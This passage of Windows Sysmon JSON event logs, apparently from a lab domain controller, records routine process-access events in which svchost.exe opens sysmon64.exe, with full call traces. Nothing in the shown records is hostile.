Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:58:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4304,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:45.751\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:45.751","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4305,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:45.751\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:45.751","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4306,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:45.751\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:45.751","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4307,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:45.751\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:45.751","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4308,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:45.751\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:45.751","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4309,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:45.751\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:45.751","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4310,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:45.751\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:45.751","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4311,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:45.751\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:45.751","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
